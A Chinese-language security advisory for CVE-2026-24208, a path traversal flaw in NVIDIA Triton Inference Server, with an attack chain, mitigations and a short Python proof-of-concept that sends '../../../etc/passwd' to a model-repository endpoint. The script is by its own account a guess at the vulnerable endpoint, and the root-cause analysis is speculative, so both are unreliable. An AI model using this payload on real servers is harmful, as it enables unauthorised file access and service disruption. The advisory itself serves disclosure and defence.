CVE-2026-24208 CVSS 5.3 中危

CVE-2026-24208 NVIDIA Triton 路径遍历漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24208

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NVIDIA Triton Inference Server

漏洞概述

NVIDIA Triton Inference Server 中存在一个路径遍历漏洞。攻击者可以通过网络向受影响的服务器发送特制的恶意请求，利用该路径遍历问题。由于该漏洞无需认证且无需用户交互即可触发，成功利用此漏洞可能导致拒绝服务，从而影响系统的可用性。建议用户尽快检查并应用官方提供的修复补丁，以防止潜在的服务中断。

技术细节

该漏洞源于 NVIDIA Triton Inference Server 在处理特定文件路径请求时，未能充分净化用户输入的数据。攻击者可以通过构造包含路径遍历序列（如 '../' 或其 URL 编码形式）的恶意网络请求，绕过服务器的目录限制机制。虽然路径遍历漏洞通常用于读取敏感文件，但在本例中，主要影响是导致拒绝服务（DoS）。这可能是因为攻击者访问了系统关键文件导致服务器进程崩溃，或者是触发了耗尽系统资源的操作。由于 CVSS 向量为 AV:N/AC:L/PR:N/UI:N/S:U，表明攻击者可以通过网络远程发起攻击，攻击复杂度低，且不需要目标系统的任何权限或用户交互，因此该漏洞具有一定的利用风险，特别是在未受保护的公网环境中。

攻击链分析

STEP 1

侦察

攻击者扫描网络以识别暴露在公网上的 NVIDIA Triton Inference Server 实例。

STEP 2

武器化

攻击者构造包含路径遍历字符（如 '../'）的 HTTP 请求，旨在访问受限目录或触发系统异常。

STEP 3

交付

通过互联网向目标服务器的 API 端点发送特制的恶意请求。

STEP 4

利用

服务器处理恶意请求时未能正确过滤路径，导致读取非预期文件或触发内部错误。

STEP 5

影响

由于处理异常或资源耗尽，Triton Inference Server 停止响应，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-24208: Path Traversal in NVIDIA Triton Inference Server
# This script attempts to trigger the path traversal vulnerability.
# Note: For educational and authorized testing purposes only.

target_host = "http://target-triton-server:8000"
# Example endpoint that might be vulnerable to path traversal
# The payload attempts to traverse directories using '../'
malicious_payload = "../../../etc/passwd" 

url = f"{target_host}/v2/repository/models/{malicious_payload}"

try:
    print(f"Sending request to: {url}")
    response = requests.get(url, timeout=10)
    
    # Check response status
    if response.status_code == 200:
        print("[+] Potential successful exploit or file content retrieved.")
        print("Response snippet:", response.text[:200])
    elif response.status_code == 500 or response.status_code == 404:
        print("[-] Server returned error. Potential DoS trigger or invalid path.")
    else:
        print(f"[*] Server responded with status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Request failed: {e}")

影响范围

NVIDIA Triton Inference Server (具体受影响版本请参考 NVIDIA 安全公告)

防御指南

临时缓解措施

在未应用补丁前，建议将 Triton Inference Server 部署在受信任的内网环境中，并通过防火墙规则严格限制访问源 IP 地址。同时，应监控服务器日志，查找是否存在异常的文件访问请求或大量的错误响应，以便及时发现潜在的攻击尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表